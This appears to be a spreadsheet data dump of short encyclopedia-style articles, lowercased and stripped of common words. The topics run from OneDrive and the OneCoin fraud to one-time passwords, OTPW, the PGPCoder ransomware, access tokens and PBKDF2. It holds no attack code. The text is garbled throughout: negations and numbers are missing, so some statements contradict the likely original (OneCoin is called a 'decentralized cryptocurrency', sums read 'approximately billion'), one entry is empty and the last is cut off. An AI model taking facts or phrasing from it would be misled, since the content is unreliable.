convenience anywhere access. personal vault strong authentication method second step identity verification, fingerprint, face, pin, code sent email sms. personal vault available macos app. interoperability onedrive allows users embed word, excel powerpoint documents pages. these embedded documents allow anyone visits pages interact them, browsing embedded powerpoint slideshow perform calculations within embedded excel spreadsheet. addition, microsoft released apis onedrive live connect enable developers develop services client apps utilizing onedrive's cloud storage. this allows users services client apps browse, view, upload edit files stored onedrive. software development (sdk) available .net framework, ios, android python limited apps windows.onedrive already interoperable host services, including: outlook.com: allows users directly upload office documents photos within outlook.com, store onedrive share users. directly save office documents within outlook.com onedrive, view edit documents directly within browser. edit office documents within browser using office online reply directly back sender edits made. facebook, twitter linkedin: enables users quickly share files contacts social networks. onedrive maintains access control list users permissions view edit files, including users social networks. bing: save share feature allows users save search histories onedrive folder. windows live groups: before discontinued, windows live groups provided group storage space onedrive shared group members. group members allowed access, create, modify delete files within group's onedrive folders, along functionality onedrive provides. however, features eventually became native onedrive. samsung gallery: users sync photos videos gallery samsung devices onedrive partnership microsoft samsung. privacy concerns data stored onedrive subject monitoring microsoft, content violation microsoft's code conduct subject removal lead temporary permanent shutdown account. this privacy concerns relation data stored onedrive. microsoft responded indicating "strict internal policies [are] place limit access user’s data", advanced mechanisms, microsoft's automated photodna scanning tool, utilized ensure users abide code conduct account contain files contravention thereof, partial human nudity (including drawings), online surveys. onedrive business microsoft similarly named unrelated software plus service offering called onedrive business (previously skydrive pro). while onedrive personal storage service web, onedrive business managed cloud storage business users replaces sharepoint workspace. physical medium information stored either hosted on-premises purchased service subscription microsoft. also comparison file hosting services comparison online backup services references external links official website</t>
  </si>
  <si>
    <t>OneCoin</t>
  </si>
  <si>
    <t>onecoin ponzi scheme promoted cryptocurrency bulgaria-based offshore companies onecoin (registered dubai) onelife network (registered belize), founded ruja ignatova concert sebastian greenwood. onecoin considered ponzi scheme organisational structure previous involvement many central onecoin similar schemes. described times "one biggest scams history".us prosecutors alleged scheme brought approximately billion worldwide. china, enforcement recovered billion yuan (us$267.5 million) prosecuting people. ignatova disappeared 2017 near time secret warrant filed arrest brother, konstantin ignatov took position. most leaders disappeared arrested, though ignatova escaped arrest. greenwood arrested 2018, konstantin ignatov march 2019. november 2019, ignatov pleaded guilty charges money laundering fraud. total maximum sentence charges years prison. concept onecoin launched late 2014. decentralized cryptocurrency, rather centralized currency hosted onecoin ltd's servers. according onecoin, main business selling educational material trading. members able educational packages ranging euros 118,000 euros, according industry blog, 225,500 euros. each package includes "tokens" assigned "mine" onecoins. onecoin said mined servers sites bulgaria site hong kong. each level (except seven), package, gives educational material, plagiarized several sources. however, typical onecoin recruiting meeting, recruiters mainly talk investing cryptocurrency educational material barely mentioned.the exchange onecoins currency onecoin exchange, xcoinx, internal marketplace members invested starter package. onecoins could exchanged euros, placed virtual wallet could requested wire transfer. marketplace daily selling limits based packages seller invested greatly limited amount onecoins could exchanged. march 2016, without notice, onecoin issued internal notice market would closed weeks maintenance, explaining necessary high number miners "better integration blockchain". march 2016, market opened visible changes made; transactions expired daily limits stayed exchange shut without notice january 2017, though individuals affiliated scheme continue accept funds. legal issues criticism 2015 september 2015, bulgaria's financial supervision commission (fsc) issued warning potential risks cryptocurrencies, citing onecoin example. after warning, onecoin ceased activity bulgaria started banks foreign countries handle wire transfers participants. 2016 february 2016, british newspaper daily mirror wrote onecoin onelife get-rich-quick scheme scam cult, calling "virtually worthless".the company scheme observation lists many authorities; among authorities bulgaria, finland, sweden, norway latvia. authorities many countries warned potential risks involved businesses like onecoin undertaken prosecutions persons linked onecoin, including ruja ignatova brother konstantin ignatov.in march 2016, direct selling association norway warned onecoin, comparing pyramid scheme.in december 2016, italian antitrust authority (autorità garante della concorrenza mercato) "adopted interim injunction company network services ltd., active promotion dissemination cryptocurrency onecoin", representatives italy, describing activities "illegal pyramid sales system" ("sistema vendita piramidale vietato dalla legge"), ordering cease promoting selling onecoin italy february 2017, concluding investigation, agcm banned activity onecoin notice.in december 2016, hungarian central bank issued warning onecoin pyramid scheme, china year several members investors onecoin arrested us$30.8 million worth assets seized. 2017 march 2017, croatian national bank (hnb) advised public "exercise high degree caution" decisions involving onecoin, noted onecoin operations supervised hnb, warned possible losses fully borne investors.on april 2017, indian police arrested people navi mumbai organizing onecoin recruitment event. police attended event undercover judge accusations decided act. further investigation begun intent revealing higher levels pyramid. may, investigation recovered 24.57 crores ($3.32 million usd) nine bank accounts. crores ($10.12 million usd) transferred authorities able seize early month people arrested crores ($3.24 million usd) seized bank accounts. special investigation team individuals including assistant police inspectors formed senior police inspector shivaji awate stated goal following money trail possibly lead arrests.on april 2017, germany's federal financial supervisory authority (bafin) issued cease desist orders onecoin ltd, dubai, onelife network ltd, belize. authority concluded trading onecoins fraudulent "own funds" trading.on april 2017, bank thailand issued warning onecoin, stating illegal digital currency used trade.on 2017, international financial services commission belize (ifsc) issued warning onelife network conducting trading business without license permission ifsc authority. onelife network directed cease desist carrying illegal trading business.on june 2017, onecoin ltd. claimed onecoin licensed vietnamese government, legally permissible digital currency first cryptocurrency asia officially licensed government. june 2017, vietnam's ministry planning investment (mpi) issued statement document onecoin used proof forged. they stated document regulations person supposedly signed document position claimed document time document created. warned individuals enterprises vigilant encounter document business.on july 2017, ruja ignatova, ceo, charged india duping investors part indian investigation. 2018 january 2018, bulgarian police raided onecoin's office sofia request prosecutor's office bielefeld, germany. german police europol took part bust investigation. also companies, tied onecoin, investigated witnesses questioned. onecoin's servers material evidence seized.on 2018, central bank samoa (cbs) banned foreign exchange transactions related onecoin onelife. bank earlier march issued warning onecoin. describes onecoin high risk pyramid scheme. 2019 2019 (plea deal, october; made public, november), ruja ignatova's brother konstantin ignatov pleaded guilty fraud money laundering connection scheme.on november 2019 york federal court found lawyer mark scott guilty money laundering bank fraud role routing us$400m us.on november 2019 published detailed investigation onecoin ignatova titled "cryptoqueen: woman scammed world, vanished". reporters believe ignatova resides frankfurt false identity. 2020 2020 fincen files showed mellon flagged fincen $137m transactions related onecoin. 2021 company onecoin, ruja ignatova gilbert armenta found default ongoing trial 2022 2022, europol added ignatova "europe's most wanted" list, offering €5,000 reward information leading arrest. june federal bureau investigation added ignatova most wanted fugitives list, offering reward $100,000 information leading arrest. also bitconnect plustoken tech references further reading missing cryptoqueen. podcast, bbc, since 2019. bovermann, philipp september 2020). "die verschwundene königin". süddeutsche zeitung german).</t>
  </si>
  <si>
    <t>One-time password</t>
  </si>
  <si>
    <t>one-time password (otp), also known one-time pin, one-time authorization code (otac) dynamic password, password valid login session transaction, computer system digital device. otps avoid several shortcomings associated traditional (static) password-based authentication; number implementations also incorporate two-factor authentication ensuring one-time password requires access something person (such small keyring device calculator built smartcard specific cellphone) well something person knows (such pin). generation algorithms typically make pseudorandomness randomness generate shared seed, cryptographic hash functions, used derive value hard reverse therefore difficult attacker obtain data used hash. this necessary otherwise, would easy predict future otps observing previous ones. otps discussed possible replacement for, well enhancer traditional passwords. downside, otps intercepted rerouted, hard tokens lost, damaged, stolen. many systems otps securely implement them, attackers still learn password phishing attacks impersonate authorized user. characteristics important advantage addressed otps that, contrast static passwords, vulnerable replay attacks. this means potential intruder manages record already used service conduct transaction able since longer valid. second major advantage user uses similar) password multiple systems, made vulnerable them, password gained attacker. number systems also ensure session cannot easily intercepted impersonated without knowledge unpredictable data created previous session, thus reducing attack surface further. there also different ways make user aware next use. some systems special electronic security tokens user carries generate otps show using small display. other systems consist software runs user's mobile phone. systems generate otps server-side send user using out-of-band channel messaging. finally, systems, otps printed paper user required carry. mathematical algorithm schemes, possible user provide server static encryption key, sending one-time password. generation concrete algorithms vary greatly details. various approaches generation otps include: based time-synchronization authentication server client providing password (otps valid short period time) using mathematical algorithm generate password based previous password (otps effectively chain must used predefined order). using mathematical algorithm password based challenge (e.g., random number chosen authentication server transaction details) and/or counter. time-synchronized time-synchronized usually related piece hardware called security token (e.g., user given personal token generates one-time password). might look like small calculator keychain charm, shows number changes occasionally. inside token accurate clock synchronized clock proprietary authentication server. systems, time important part password algorithm, since generation passwords based current time rather than, addition previous password secret key. this token proprietary device, mobile phone similar mobile device runs software proprietary, freeware, open-source. example time-synchronized standard time-based one-time password (totp). some applications used keep time-synchronized otp, like google authenticator password manager. hash chains each created past otps used. example type algorithm, credited leslie lamport, uses one-way function (call {\displaystyle this one-time password system works follows: seed (starting value) {\displaystyle chosen. hash function {\displaystyle f(s)} applied repeatedly (for example, 1000 times) seed, giving value {\displaystyle f(f(f(\ldots f(s)\ldots )))} this value, call 1000 {\displaystyle f^{1000}(s)} stored target system. user's first login uses password {\displaystyle derived applying {\displaystyle times seed, {\displaystyle f^{999}(s)} target system authenticate correct password, {\displaystyle f(p)} 1000 {\displaystyle f^{1000}(s)} value stored. value stored replaced {\displaystyle user allowed next login, must accompanied {\displaystyle f^{998}(s)} again, validated hashing gives {\displaystyle f^{999}(s)} {\displaystyle value stored previous login. again, value replaces {\displaystyle user authenticated. this repeated another times, time password {\displaystyle applied fewer time, validated checking hashed, gives value stored previous login. hash functions designed extremely hard reverse, therefore attacker would need know initial seed {\displaystyle calculate possible passwords, computer system confirm password given occasion valid checking that, hashed, gives value previously used login. indefinite series passwords wanted, seed value chosen {\displaystyle exhausted. although server's counter value incremented successful authentication, counter token incremented every time password requested user. because this, counter values server token might synchronization. recommended look-ahead parameter {\displaystyle server, defines size look-ahead window. case accidental password generation user, server still authenticate client, recalculate next {\displaystyle otp-server values, check received password client.to next password series previous passwords, needs find calculating inverse function {\displaystyle f^{-1}} since {\displaystyle chosen one-way, extremely difficult {\displaystyle cryptographic hash function, generally case, assumed computationally intractable task. intruder happens one-time password access time period login, becomes useless period expires. s/key one-time password system derivative based lamport's scheme. challenge–response challenge–response one-time passwords requires user provide response challenge. example, done inputting value token generated token itself. avoid duplicates, additional counter usually involved, happens challenge twice, still results different one-time passwords. however, computation usually involve previous one-time password; usually, another algorithm used, rather using algorithms. implementations common technology used delivery otps text messaging. because text messaging ubiquitous communication channel, directly available nearly mobile handsets and, text-to-speech conversion, mobile landline telephone, text messaging great potential reach consumers total cost implement. text messaging encrypted using a5/x standard, several hacking groups report successfully decrypted within minutes seconds. additionally, security flaws routing protocol used redirect associated text messages attackers; 2017, several customers germany breached manner order gain access mobile banking accounts. july 2016, u.s. nist issued draft special publication guidance authentication practices, discourages method implementing out-of-band two-factor authentication, ability intercepted scale. text messages also vulnerable swap scams—in attacker fraudulently transfers victim's phone number card, used gain access messages sent hardware tokens security's securid example time-synchronization type token, along global's solutions. like tokens, lost, damaged, stolen; additionally, inconvenience batteries die, especially tokens without recharging facility non-replaceable battery. variant proprietary token proposed 2006 described "ubiquitous authentication", would partner manufacturers physical securid chips devices mobile phones. recently, become possible take electronic components associated regular keyfob tokens embed credit card form factor. however, thinness cards, 0.79mm 0.84mm thick, prevents standard components batteries used. special polymer-based batteries must used much lower battery life coin (button) cells. semiconductor components must flat must minimise power used standby operating. yubico offers small token embedded chip creates pressed simulates keyboard facilitate easily entering long password. since device avoids inconvenience battery replacement. version technology developed embeds keypad payment card standard size thickness. card embedded keypad, display, microprocessor proximity chip. soft tokens smartphones, one-time passwords also delivered directly mobile apps, including dedicated authentication apps authy google authenticator, within service's existing app, case steam. these systems share security vulnerabilities sms, necessarily require connection mobile network use. hard copies countries' online banking, bank sends user numbered list otps printed paper. other banks send plastic cards actual otps obscured layer user scratch reveal numbered otp. every online transaction, user required enter specific list. some systems numbered otps sequentially, others pseudorandomly choose entered. security when correctly implemented, otps longer useful attacker within short time initial use. this differs passwords, remain useful attackers years fact. passwords, otps vulnerable social engineering attacks phishers steal otps tricking customers providing otps. also like passwords, otps vulnerable man-in-the-middle attacks, making important communicate secure channel, example transport layer security. fact passwords vulnerable similar kinds attacks motivation universal factor, designed resistant phishing attacks. otps involve time-synchronization challenge–response component necessarily longer window vulnerability compromised use. late 2005 customers swedish bank tricked giving pre-supplied one-time passwords. 2006 type attack used customers bank. standardization many technologies patented. this makes standardization area difficult, company tries push technology. standards however, exist example, 1760 (s/key), 2289 (otp), 4226 (hotp) 6238 (totp). mobile phone mobile phone hand-held authentication token. mobile text messaging ways receiving otac mobile phone. way, service provider sends text message includes otac enciphered digital certificate user authentication. according report, mobile text messaging provides high security uses public infrastructure (pki) provide bidirectional authentication non-repudiation, accordance theoretical analysis.sms method receiving otacs broadly used daily lives purposes banking, credit/debit cards, security. telephone there methods using telephone verify user’s authentication. with first method, service provider shows otac computer smartphone screen makes automatic telephone call number already authenticated. then user enters otac appears screen telephone keypad.with second method, used authenticate activate microsoft windows, user call number provided service provider enters otac phone system gives user. computer field computer technology, known using one-time authorization code (otac) email, broad sense, using one-time authorization code (otac) web-application, professional sense. email common ways using otacs. there main methods used. with first method, service provider sends personalised time authenticated email address e.g. @ucl.ac.uk, user clicks server authenticates user. with second method, service provider sends personalised otac (e.g. enciphered token) authenticated email address user types otac website server authenticates user. application generate unique personal identification number (pin) user input desktop client, desktop client, turn, uses code authenticate application. this form authentication particularly useful applications internal username/password store instead saml authentication. since saml works within browser, desktop-based application client cannot successfully authenticate using saml. instead, client application one-time authorization code (otac) authenticate application. addition, possible oauth authorization framework third party application needs obtain limited access http service. post possible send otacs user post registered mail. when user requests otac, service provider sends post registered mail user authentication. example, banks send otac internet banking authorization post registered mail. expansion quantum cryptography, based uncertainty principle ideal methods produce otac.moreover, discussed used using enciphered code authentication also using graphical time authentication code provides decentralized access control technique anonymous authentication. also google authenticator freeotp initiative open authentication key-agreement protocol kyps one-time code (cryptography) one-time code opie authentication system otpw personal identification number public infrastructure code s/key security token time-based one-time password algorithm two-factor authentication references</t>
  </si>
  <si>
    <t>OTPW</t>
  </si>
  <si>
    <t>otpw one-time password system developed authentication unix-like operating systems markus kuhn. user's real password directly transmitted across network. rather, series one-time passwords created short characters (constant secret) one-time tokens. single-use password used once, passwords intercepted password sniffer logger useful attacker. otpw supported unix linux (via pluggable authentication modules), openbsd, netbsd, freebsd, generic open source implementation used enable systems. otpw, like one-time password systems, sensitive middle attack used itself. this could example solved putting ssl, spkm similar security protocol "under authenticates server gives point-to-point security client server. design differences implementations unlike s/key, otpw based lamport's scheme every one-time password one-way hash value successor. password lists based lamport's scheme problem attacker last passwords list, previous passwords calculated also store encrypted passwords suggested aviel rubin independent one-time passwords, order keep host free files secrets. otpw one-way hash value every single password stored potentially widely readable file user’s home directory. instance, hash values passwords typical page) require four kilobyte long .otpw file, typically negligible amount storage space. passwords carefully generated random numbers. random number generator based ripemd-160 secure hash function, seeded hashing together output various shell commands. these provide unpredictability form system random number seed, access times important system files, usage history host, more. random state 160-bit output hash function. random state iterated concatenating state current high-resolution timer output hashing result again. first bits hash output encoded modified base64 scheme produce readable passwords, remaining bits represent undisclosed internal state random number generator. many fonts, characters difficult distinguish, therefore modified base64 encoding replaces three characters corresponding instance zero confused capital user, password verification routine automatically correct this. s/key uses sequences short english words passwords. otpw uses default base64 encoding instead, allows passwords printed single page, password entropy. addition, average human needs seconds write 12-character random string short-term memory, provides good protection brief looks attacker might password list. lists short words hand much faster memorize. otpw handle arbitrary password generation algorithms, long length password fixed. current version, otpw-gen program generate base-64 encoded (option 4-letter-word encoded (option -p1) passwords user-specified entropy (option -e). prefix password ensures neither stealing password list eavesdropping line alone provide unauthorized access. admittedly, security obtained otpw comparable challenge–response system user pin-protected special calculator generates response. hand, piece paper much portable, much robust, much cheaper special calculator. otpw designed large user base, extra battery-powered device inconvenient cost effective therefore still normal unix passwords everywhere. contrast suggestion made 1938, otpw lock one-time password time. this, attacker could easily exhaust list unlocked passwords force either login normal unix login password. therefore, otpw locks single password logins triple-challenge issued. unused passwords remain available, million different challenges attacker little chance perform successful race attack authorized user finishes password entry. usage one-time password authentication otpw package accomplished file .otpw located user’s home directory. state kept system-wide files, therefore otpw introduce setuid root programs. long user .otpw home directory, one-time-password facility activated him. user wants one-time-password capability executes otpw-gen program. program prefix password write password list standard output. chosen prefix password memorized password list formatted printed. where one-time-password authentication used, password prompt followed 3-digit password number. enter first prefix password given otpw-gen, followed directly (without hitting return between) password requested number printed password list: login: kuhn password 019: geheimodakh62c example, geheim prefix password. clever attacker might observe password entered might fact computers send data much faster users finish entering passwords. several hundred milliseconds user needs press return last character, attacker could parallel connection machine send code return faster user. prevent race-for-the-last-key attack, login attempt taking place concurrently another attempt require three one-time passwords entered, neither ever password locked concurrent authentication attempt. login: kuhn password 022/000/004: geheimq=xk4i7wizdbbqyha5z9japt also opie authentication system one-time passwords one-time s/key external links "otpw home". haller, neil; metz, craig; nesser, philip straw, mike (february 1998). one-time password system. ietf. doi:10.17487/rfc2289. 2289. retrieved 2009-10-24.</t>
  </si>
  <si>
    <t>Occitan (local currency)</t>
  </si>
  <si>
    <t>occitan name community currency started 2010 pézenas, languedoc-roussillon, france. named occitan language. occitan program intended promote local commerce. occitan operates fixed exchange rate: occitan there fixed commission members (shops) individuals. creation objectives initiative local shopkeeper organization, aca, occitan intended stimulate local economy. currency issue, exchange acceptance they 1-year validity. bills occitans issued. they feature occitan cross portrait molière started career pézenas. maintain individual bill's validity, "scrip" corresponding banknote value must paid every months. (this system, called demurrage, form currency circulation invented silvio gesell.) also abeille berkshares chiemgauer references external links official website</t>
  </si>
  <si>
    <t>PGPCoder</t>
  </si>
  <si>
    <t>pgpcoder gpcode trojan encrypts files infected computer asks ransom order release files, type behavior dubbed ransomware cryptovirology. trojan once installed computer, trojan creates registry keys: ensure every system startup, second monitor progress trojan infected computer, counting number files analyzed malicious code. once run, trojan embarks mission, encrypt, using digital encryption key, files finds computer drives extensions corresponding listed code. these extensions include .doc, .html, .jpg, .xls, .zip, .rar. blackmail completed trojan dropping text file directory, instructions victim email address supplied users supposed request files released paying ransom $100–200 e-gold liberty reserve account. efforts combat trojan while gpcode variants successfully implemented, many variants flaws allow users recover data without paying ransom fee. first versions gpcode used custom-written encryption routine easily broken. variant gpcode.ak writes encrypted file location, deletes unencrypted file, allows undeletion utility recover files. once encrypted+unencrypted pairs found, sometimes gives enough information decrypt files. variant gpcode.am uses symmetric encryption, made recovery easy. late november 2010, version called gpcode.ax reported. uses stronger encryption (rsa-1024 aes-256) physically overwrites encrypted file, making recovery nearly impossible.kaspersky able make contact author program, verify individual real author, unable determine real world identity. references external links kaspersky kaspersky blog posts kaspersky forum dedicated gpcode kaspersky virus descriptions stopgpcode trojan removal utilities other virus description databases f-secure symantec mcafee: gpcoder gpcoder.e gpcoder.f gpcoder.g gpcoder.h gpcoder.i trend micro: troj_pgpcoder.a troj_pgpcoder.b troj_pgpcoder.c troj_pgpcoder.d troj_pgpcoder.e troj_pgpcoder.f troj_pgpcoder.g threatexpert</t>
  </si>
  <si>
    <t>Access Control Service</t>
  </si>
  <si>
    <t>access control service, windows azure access control service (acs) microsoft-owned cloud-based service provided easy authenticating authorizing users gain access applications services allowing features authentication authorization factored application code. this facilitates application development time providing users benefit able multiple applications reduced number authentications, cases authentication. system provides authorization store accessed programmatically well management portal. once authorizations configured, user coming application arrives application entrance authentication token, also authorization claims attached token. retired microsoft november 2018. features following features integration windows identity foundation (wif) support saml 1.1, saml 2.0, simple token (swt) json token (jwt) token formats (jwt still beta) integrated customizable home realm discovery allows users choose identity provider browser-based management portal allows administrative access configuration platform support supports modern platforms .net framework, php, python, java ruby. used applications services. also azure services platform claims based identity references</t>
  </si>
  <si>
    <t>Airdrop (cryptocurrency)</t>
  </si>
  <si>
    <t>airdrop unsolicited distribution cryptocurrency token coin, usually free, numerous wallet addresses. airdrops often associated launch cryptocurrency defi protocol, primarily gaining attention followers, resulting larger user base wider disbursement coins. airdrops important part icos since crypto entrepreneurs started private sales instead public offerings raise initial capital. airdrops also often used companies, brands entrepreneurs reward current holders, investors collectors, receive tokens, coins assets free, based much invested contributed certain project.airdrops take advantage network effect engaging existing holders particular blockchain-based currency, bitcoin ethereum currency project.in united states, practice raised policy issues liability whether amount income capital gains.a dusting attack important risk crypto airdrops take consideration. references</t>
  </si>
  <si>
    <t>Offer Assistant</t>
  </si>
  <si>
    <t>offer assistant browser-based password, finance, promotional offers manager internet explorer firefox. certified truste, verisign, softpedia. featured visa, wells fargo, bank america, target, netspend. offer assistant featured magazine four-star rating, editor's choice, reviewed download.com, makeuseof, lifehacker, bestfreewaredownload. awards webby award nominee banking/bill paying website 2009 13th annual webby awards american business awards stevie awards finalist 2009 best ecommerce site interactive media awards 2008 outstanding achievement financial services also comparison password managers list password managers password manager cryptography references external links archived 2012-10-17 wayback machine</t>
  </si>
  <si>
    <t>Air India data breach</t>
  </si>
  <si>
    <t>2021 india cyberattack cyberattack affected million customers india airlines. cyberattack 2021, reported india subjected cyberattack whereas personal details million customers around world compromised including passport, credit card details, birth dates, name ticket information.air india's data processor, sita swiss technology company known offering passenger processing reservation system services reported data breach india around february 2021. data breach involved information registered sita data processor august 2011 february 2021. also revealed cyberattackers gained access systems period days.it reported compromised servers hackers later secured india took steps engaging external data security specialists. india also guaranteed passengers conclusive evidence whether misuse personal data reported. airlines also urged encouraged passengers immediately change passwords. references also easyjet hack 2018 british airways cyberattack list security hacking incidents list data breaches</t>
  </si>
  <si>
    <t>Omega Engineering</t>
  </si>
  <si>
    <t>omega engineering american instrumentation company headquartered norwalk, connecticut, main factory bridgeport, jersey.it sales offices united kingdom, canada, germany, china, brazil, singapore, korea, japan, mexico. local websites also available customers france, spain, italy, denmark, netherlands, australia, india, chile. omega business united states navy, nasa industrial corporations.omega owned british-owned conglomerate spectris plc. since 2011. history company founded 1962 betty hollander kitchen table raising children. omega began thermocouple manufacturer slowly transitioned types instrumentation. today, omega manufactures sells devices measure everything temperature hacking 1996, lloyd, 11-year employee omega network administrator within company, fired. three weeks fired, unleashed hacking "time bomb" within omega's computer systems, deleting software omega's manufacturing operations factory bridgeport, jersey. omega spent nearly million repairing programs lost nearly million revenue, resulting employee layoffs, though lloyd's lawyer stated omega's losses smaller. lloyd convicted computer sabotage sentenced months federal prison. lloyd hacking case considered largest employee sabotage cases united states business history. case also aired forensic files episode "hack attack", episode season sale spectris april 2011, betty hollander died, company turned husband milton hollander. later year, milton hollander sold omega engineering british-based spectris $475 million. then, march 2017, spectris forced recognize impairment charge £115 million relation past acquisition. this charge decreased goodwill intangible assets spectris' balance sheet. charge also decreased 2016 income. sale arcline april 2022, spectris announced sale omega engineering arcline investment management $525 million. this $100 million book value subsequent goodwill writeoff spectris previously took. spectris announced $390 million stock buyback result sale. references external links http://www2.ca3.uscourts.gov/opinarch/002409.txt lloyd, circuit, appeal overturning trial order reinstating trial verdict.</t>
  </si>
  <si>
    <t>PCKeeper</t>
  </si>
  <si>
    <t>pckeeper advertised optimization services package featuring software utilities windows owned essentware s.a. (company based bratislava, slovakia). includes separate products windows: pckeeper live pckeeper antivirus.pckeeper originally developed zeobit founded 2009 slava kolomiychuk. pckeeper released september 2010. kromtech alliance acquired pckeeper mackeeper zeobit 2013. 2015, pckeeper changed legal owners kromtech alliance corp. essentware s.a. kromtech alliance made decision focus products users only. essentware s.a. office registered panama. principal officers developers company remain ukraine. exaggerated warning messages class action lawsuits filed kromtech version pckeeper, mackeeper. first lawsuit, filed illinois, alleges "contrary zeobit's marketing in-software representations, however, neither free trial full registered versions mackeeper perform credible diagnostic testing user's mac. instead, zeobit intentionally designed mackeeper invariably ominously report consumer's needs repair at-risk harmful errors, privacy threats, problems, regardless computer's actual condition."[11] second complaint, filed holly yencha pennsylvania, alleges free starter version mackeeper identifies harmless programs "critical" problems. complaint claims "under mackeeper's reporting algorithm, even brand computers 'critical' condition require repair purchasing full version." [12]pckeeper live sometimes installed users' partner programs, cause unwanted pop-up windows. pckeeper live pckeeper live offers different services categories: human assistance (find fix, geek demand, live support), security (anti-theft, data hider, shredder, files recovery), cleaning (disk cleaner, disk explorer, duplicates finder, uninstaller) optimization (context menu manager, startup manager). popup pckeeper sometimes advertised ads. many occur pornography websites. reviews pckeeper live rated "good" (3.5 pcmag editor, stating "improves performance", "great novice users" "the utility clean well iolo system mechanic, considering accessibility wallet friendliness, check out" "kromtech pckeeper live's human specialists unique price plans make tune-up utility worthy consideration, rival applications offer better improvement". techradar.pro rates stars noted, "overall, pckeeper light-weight tool annoy pop-up windows", "when consider fact pckeeper live's optimization features easily found free tools, simply useful all, price kromtech solution seems unreasonably high." "kromtech's 24/7 support elevates pckeeper live overpriced utility program tool even non-geek optimize his/her computer."pckeeper reviewed wide range tech experts. reviewed turkish", french", portuguese", spanish", german". review pcmag thus described pckeeper live: "improves performance. multiple price points. advice microsoft-certified computer specialists. anti-theft technology". gained points." pckeeper antivirus pckeeper antivirus integrates avira's secure anti-virus (savapi), official interface avira’s anti-malware scanning engine. pckeeper antivirus block malware-hosting url's phishing url's. according virus bulletin, pckeeper antivirus scored 96.1% tests stability level stable. pckeeper antivirus vb100 award. pckeeper antivirus (version 1.x) received opswat gold certifications antispyware antivirus categories.the german organization av-test.org tested anti-virus programs. testers found ahnlab, microsoft windows defender pckeeper antivirus lowest performing anti-virus applications windows 8.1. testing results reviews pcmag rated pckeeper antivirus good noting pckeeper antivirus "streamlined, attractive interface. easy non-techies. good score hands-on malware blocking testing". however, scored poorly independent testing chat based support "soured fact served misinformation." concluded "you'd better panda free antivirus 2015, editors' choice free antivirus. slightly edged pckeeper tests swept field tests, high marks across board. price pckeeper, could bitdefender antivirus plus 2015 kaspersky anti-virus (2015), named editors' choice paid antivirus. better choice." social campaigns 2013 pckeeper customers decide much software, launching want campaign. also antivirus software comparison antivirus software comparison computer viruses references external links pckeeper website</t>
  </si>
  <si>
    <t>Access token</t>
  </si>
  <si>
    <t>computer systems, access token contains security credentials login session identifies user, user's groups, user's privileges, and, cases, particular application. instances, asked enter access token (e.g. random characters) rather usual password therefore kept secret like password). overview access token object encapsulating security identity process thread. token used make security decisions store tamper-proof information system entity. while token generally used represent security information, capable holding additional free-form data attached token created. tokens duplicated without special privilege, example create token lower levels access rights restrict access launched application. access token used windows process thread tries interact objects security descriptors (securable objects). windows, access token represented system object type token. access token generated logon service user logs system credentials provided user authenticated authentication database. authentication database contains credential information required construct initial token logon session, including user primary group groups part information. token attached initial process created user session inherited subsequent processes created initial process. whenever process opens handle resource access control enabled, windows reconciles data target object's security descriptor contents current effective access token. result access check evaluation indication whether access allowed and, operations (read, write/modify, etc.) calling application allowed perform. types token there types tokens available: primary token primary tokens associated processes, represent process's security subject. creation primary tokens association processes privileged operations, requiring different privileges name privilege separation typical scenario sees authentication service creating token, logon service associating user's operating system shell. processes initially inherit copy parent process's primary token. impersonation token impersonation security concept implemented windows allows server application temporarily "be" client terms access secure objects. impersonation four possible levels: anonymous, giving server access anonymous/unidentified user, identification, letting server inspect client's identity identity access objects, impersonation, letting server behalf client, delegation, impersonation extended remote systems server connects (through preservation credentials). client choose maximum impersonation level any) available server connection parameter. delegation impersonation privileged operations (impersonation initially not, historical carelessness implementation client apis failing restrict default level "identification", letting unprivileged server impersonate unwilling privileged client, called it). impersonation tokens associated threads, represent client process's security subject. impersonation tokens usually created associated current thread implicitly, mechanisms rpc, named pipes. contents token token composed various fields, including: identifier. identifier associated logon session. session maintained authentication service, populated authentication packages collection information (credentials) user provided logging credentials used access remote systems without need user re-authenticate (single sign-on), provided systems involved share authentication authority (e.g. kerberos ticket server) user identifier. this field important strictly read-only. identifiers groups user (or, precisely, subject) part group identifiers cannot deleted, disabled made "deny-only". groups designated session volatile group representing logon session, allowing access volatile objects associated session, display. restricting group identifiers (optional). this additional groups grant additional access, restricts access object allowed allowed also groups. restricting groups cannot deleted disabled. restricting groups recent addition, used implementation sandboxes. privileges, i.e. special capabilities user has. most privileges disabled default, prevent damage non-security-conscious programs. starting windows service pack windows server 2003 privileges permanently removed token call adjusttokenprivileges() se_privilege_removed attribute. default owner, primary group token created subject associated token. also references</t>
  </si>
  <si>
    <t>PC Tools (company)</t>
  </si>
  <si>
    <t>PBKDF2</t>
  </si>
  <si>
    <t>cryptography, pbkdf1 pbkdf2 (password-based derivation function derivation functions sliding computational cost, used reduce vulnerabilities brute-force attacks.pbkdf2 part laboratories' public-key cryptography standards (pkcs) series, specifically pkcs v2.0, also published internet engineering task force's 2898. supersedes pbkdf1, could produce derived keys bits long. 8018 (pkcs v2.1), published 2017, recommends pbkdf2 password hashing. purpose operation pbkdf2 applies pseudorandom function, hash-based message authentication code (hmac), input password passphrase along salt value repeats process many times produce derived key, used cryptographic subsequent operations. added computational work makes password cracking much difficult, known stretching. when standard written year 2000 recommended minimum number iterations 1,000, parameter intended increased time speeds increase. kerberos standard 2005 recommended 4,096 iterations; apple reportedly used 2,000 10,000 lastpass 2011 used 5,000 iterations javascript clients 100,000 iterations server-side hashing. 2021, owasp recommended 310,000 iterations pbkdf2-hmac-sha256 120,000 pbkdf2-hmac-sha512. having salt added password reduces ability precomputed hashes (rainbow tables) attacks, means multiple passwords tested individually, once. standard recommends salt length least bits. national institute standards technology recommends salt length bits. derivation process pbkdf2 derivation function five input parameters: pbkdf2(prf, password, salt, dklen)where: pseudorandom function parameters output length hlen (e.g., keyed hmac) password master password derived generated salt sequence bits, known cryptographic salt number iterations desired dklen desired bit-length derived generated derived keyeach hlen-bit block derived computed follows (with marking string concatenation): tdklen/hlen f(password, salt, i)the function iterations chained prfs. first iteration uses password salt concatenated encoded big-endian 32-bit integer input. (note 1-based index.) subsequent iterations password output previous computation input: f(password, salt, ucwhere: prf(password, salt int_32_be(i)) prf(password, prf(password, uc−1)for example, wpa2 uses: pbkdf2(hmac−sha1, passphrase, ssid, 4096, 256)pbkdf1 simpler process: initial (called version) created prf(password salt), following ones simply prf(uprevious). extracted first dklen bits final hash, size limit. hmac collisions pbkdf2 interesting property using hmac pseudo-random function. possible trivially construct number different password pairs collisions within pair. supplied password longer block size underlying hmac hash function, password first pre-hashed digest, digest instead used password. example, following password long: password: 